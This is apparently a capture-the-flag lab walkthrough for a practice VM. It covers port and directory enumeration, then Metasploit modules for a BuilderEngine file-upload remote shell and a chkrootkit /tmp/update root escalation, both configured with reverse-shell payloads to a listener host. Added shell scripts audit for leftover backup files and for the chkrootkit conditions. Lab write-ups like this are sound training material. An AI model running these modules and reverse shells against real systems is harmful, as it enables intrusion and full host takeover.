# Lab setup

Download the VM, import it as-is, and set the network adapter to NAT mode; that is all the setup needed.

IP: 192.168.1.131

# Initial information gathering

Open ports:

```
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
993/tcp   open  imaps
995/tcp   open  pop3s
8080/tcp  open  http-proxy
46322/tcp open  unknown
```

Directory enumeration:

```
[02:38:38] 301 -  314B  - /blocks  ->  http://192.168.1.131/blocks/
[02:38:41] 200 -  392B  - /codeception.yml
[02:38:50] 301 -  313B  - /files  ->  http://192.168.1.131/files/
[02:38:50] 200 -  522B  - /files/
[02:38:59] 200 -  706B  - /license.txt
[02:39:05] 301 -  315B  - /modules  ->  http://192.168.1.131/modules/
[02:39:05] 200 -  538B  - /modules/
[02:39:18] 200 -   36B  - /robots.txt
[02:39:19] 403 -  293B  - /server-status
[02:39:19] 403 -  294B  - /server-status/
[02:39:26] 301 -  314B  - /system  ->  http://192.168.1.131/system/
[02:39:26] 200 -  120B  - /system/
[02:39:27] 301 -  314B  - /themes  ->  http://192.168.1.131/themes/
[02:39:27] 200 -  503B  - /themes/
```

Web server scan findings:

```
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 65, size: 53fb059bb5bc8, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /files/: Directory indexing found.
+ /files/: This might be interesting.
+ /system/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /license.txt: License file found may identify site software.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
```
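Two of the findings above, the `#wp-config.php#` editor backup and directory indexing on `/files/`, are the kind of leftover a deployment check catches before a scanner does. The following POSIX shell script is an added example, not part of the original walkthrough or of any scanner's code: it walks a web root for editor autosave/backup/swap files and for directories that have no index file (exactly what Apache lists when `Options Indexes` is on). The web root path is a parameter, and the directory names in the usage note are constructed for illustration.

```shell
#!/bin/sh
# Added hardening check; not part of the original walkthrough. It looks for the
# two kinds of leftovers the scan output above reports: editor/backup copies such
# as "#wp-config.php#" (an emacs autosave that still holds the contents of the
# real file) and directories without an index file, which Apache lists when
# "Options Indexes" is enabled. Run it against the web root before deployment.
# The web root path is a parameter; sample trees in the usage note are constructed.

# backup_files WEBROOT: print editor autosave/backup/swap files under WEBROOT
backup_files() {
    find "$1" -type f \( -name '#*#' -o -name '*~' -o -name '.*.swp' -o -name '*.bak' \)
}

# noindex_dirs WEBROOT: print every directory (WEBROOT included) lacking
# index.html/index.php, i.e. every directory that directory indexing would list
noindex_dirs() {
    find "$1" -type d | while IFS= read -r d; do
        [ -e "$d/index.html" ] || [ -e "$d/index.php" ] || printf '%s\n' "$d"
    done
}

# report WEBROOT: print labelled findings; returns 1 if anything was found, else 0
report() {
    b=$(backup_files "$1" | sed 's/^/BACKUP:  /')
    n=$(noindex_dirs "$1" | sed 's/^/NOINDEX: /')
    [ -n "$b" ] && printf '%s\n' "$b"
    [ -n "$n" ] && printf '%s\n' "$n"
    [ -z "$b$n" ]
}

# Stand-alone usage: WEBROOT=/var/www/html sh check_webroot.sh
if [ -n "${WEBROOT:-}" ]; then
    report "$WEBROOT"
fi
```

On a web root containing `index.php`, `system/index.html`, a stray `#wp-config.php#` and a `files/` directory with only `notes.txt`, `report` prints one `BACKUP:` line for the autosave and one `NOINDEX:` line for `files/`, then returns 1; removing the autosave and adding `files/index.html` makes it return 0. Because the check is file-based it also works in CI against a checkout, before the site is ever reachable.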

Service version detection:

```
PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3    Dovecot pop3d
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
46322/tcp open  status      1 (RPC #100024)
```

From the information gathered under /themes/, the site's theme is identified as "Default 2015 Theme for BuilderEngine V3".

Searching Metasploit for this theme turns up a module for a known vulnerability in BuilderEngine, which we use directly.

# Exploitation

# Getting a shell through BuilderEngine

Use the Metasploit module to obtain a shell:

```
msf6 exploit(multi/http/builderengine_upload_exec) > show options

Module options (exploit/multi/http/builderengine_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.131    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                         cs/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to BuilderEngine
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   BuilderEngine 3.5.0



View the full module info with the info, or info -d command.
```

# Privilege escalation

Listing the running processes shows chkrootkit; the matching Metasploit module is used to escalate privileges.

```
msf6 exploit(unix/local/chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION     1                     yes       The session to run this module on


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.
```

After `run`, simply wait for the scheduled execution to trigger the reverse shell.

# Summary

The principle behind the chkrootkit exploit is described here: https://www.exploit-db.com/exploits/33899

On its scheduled runs, chkrootkit executes /tmp/update; commands written into that file run with the privileges of the user running chkrootkit, which is how root is obtained directly.
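The escalation in the previous section works only when three things line up: a chkrootkit older than 0.50 (the release that stopped running `/tmp/update`), a writable temp directory where `update` can be planted, and chkrootkit being scheduled unattended as root. The following POSIX shell script is an added audit helper, not part of the original walkthrough, of chkrootkit, or of the Metasploit module; it reports which of those conditions hold on a host. It assumes `chkrootkit -V` prints a `chkrootkit version X.YY` line, and takes the temp and cron directories as parameters so the check can be exercised on test copies.

```shell
#!/bin/sh
# Added audit helper; not part of the original walkthrough or of chkrootkit itself.
# It checks a Linux host for the three conditions that together make the
# chkrootkit /tmp/update behaviour (EDB-ID 33899) a root-escalation path:
#   1. chkrootkit older than 0.50 (the release that stopped executing /tmp/update),
#   2. a file named "update" already present in the temp directory,
#   3. chkrootkit scheduled from a cron directory, i.e. run unattended as root.
# Assumptions: "chkrootkit -V" reports "chkrootkit version X.YY"; the temp and
# cron directories are parameters so the check can be exercised on test copies.

# parse_version: read a "chkrootkit version 0.49"-style line on stdin, print "0.49"
parse_version() {
    sed -n 's/.*version \([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p'
}

# version_lt A B: succeed if A is older than B (chkrootkit uses MAJOR.MINOR only)
version_lt() {
    a_major=${1%%.*}; a_minor=${1#*.}
    b_major=${2%%.*}; b_minor=${2#*.}
    [ "$a_major" -lt "$b_major" ] ||
        { [ "$a_major" -eq "$b_major" ] && [ "$a_minor" -lt "$b_minor" ]; }
}

# audit_chkrootkit VERSION TMP_DIR CRON_DIR
# Prints one FINDING line per condition met and returns the number of findings,
# so a return value of 0 means none of the three conditions holds.
audit_chkrootkit() {
    version=$1; tmp_dir=$2; cron_dir=$3
    findings=0
    if version_lt "$version" "0.50"; then
        echo "FINDING: chkrootkit $version predates 0.50 and will execute $tmp_dir/update"
        findings=$((findings + 1))
    fi
    if [ -e "$tmp_dir/update" ]; then
        echo "FINDING: $tmp_dir/update exists (owner/mode: $(ls -ld "$tmp_dir/update" | awk '{print $3, $1}'))"
        findings=$((findings + 1))
    fi
    # any cron snippet mentioning chkrootkit means it runs unattended, as root
    if grep -ls chkrootkit "$cron_dir"/* >/dev/null 2>&1; then
        echo "FINDING: chkrootkit is scheduled from $cron_dir (runs unattended as root)"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Stand-alone use against the live host (requires chkrootkit to be installed):
#   AUDIT_LIVE=1 sh audit_chkrootkit.sh
if [ "${AUDIT_LIVE:-0}" = 1 ]; then
    live_version=$(chkrootkit -V 2>&1 | parse_version)
    [ -n "$live_version" ] || { echo "could not read chkrootkit version" >&2; exit 2; }
    audit_chkrootkit "$live_version" /tmp /etc/cron.daily
fi
```

For a host like the one in this walkthrough (chkrootkit 0.49, `/tmp/update` present, a `chkrootkit` snippet in `/etc/cron.daily`) the function prints three FINDING lines and returns 3; on a patched host with an empty temp directory it returns 0. The single most effective fix is the first condition, upgrading chkrootkit to 0.50 or later, since that removes the `/tmp/update` execution entirely; the other two checks remain useful as evidence that the pre-condition for abuse has already been staged.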